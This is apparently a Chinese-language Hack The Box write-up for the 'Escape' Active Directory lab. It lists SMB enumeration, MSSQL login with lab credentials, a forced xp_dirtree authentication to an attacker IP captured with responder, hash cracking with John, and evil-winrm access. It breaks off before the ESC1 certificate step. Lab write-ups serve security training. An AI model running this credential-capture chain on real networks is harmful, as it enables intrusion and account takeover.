HTB-Escape
概要
Escap
是一个中等难度的 Windwos Active Directory
机器,以 SMB
共享启动,经过身份验证的来宾用户可以下载敏感的 PDF 文件
。PDF 文件内的临时凭据可用于访问计算机运行的 MSSQL
服务。攻击者能够控制 MSSQL
服务对其计算机进行身份验证并捕获 HASH
。事实证明,该服务正在用户账户下运行,并且 HASH 是可破解的。拥有一组有效的凭据后,攻击者能够使用 WinRM
在计算机上执行系统命令。枚举计算机时,日志文件会显示用于进一步枚举计算机的凭据,显示存在证书颁发机构和用户 ryan.cooper
。使用 Certify
工具可以检测到一个证书模板容易受到 ESC1
攻击,这意味着能够使用此模板的用户可以对域中任何用户请求证书。因此,利用 ESC1 漏洞,攻击者能够获取管理员账户的有效证书,然后使用它来获取管理员用户的 HASH。
SMB 信息泄露
枚举主机 smb 信息
smbclient -L \\\\ sequel.htb\\
登录 public 账户
smbclient \\\\sequel\\public
在 PDF 文件里找到用户账户信息
smb: \> ls
SQL Server Procedures.pdf
使用 impacket MsSQL客户端连接
impacket-mssqlclient PublicUser:GuestUserCantWrite1@sequal.htb
在机器上监听网卡
responder -I tun0 -v
在 MsSQL 上强制执行某某·
EXEC MASTER.sys.xp_dirtree '\\10.10.14.4\test', 1, 1
监听到了会连的 Hash,使用 John 破解。
john --wordlist=/../rockyou.txt hash
得到系统账户密码 sql_srv:REGGIE1234ronnie
ls C:\users
使用 evil-winrm 连接 Windows 命令行
evil-winrm -i sequel.htb -u ryan.cooper -p NuclearMosquito3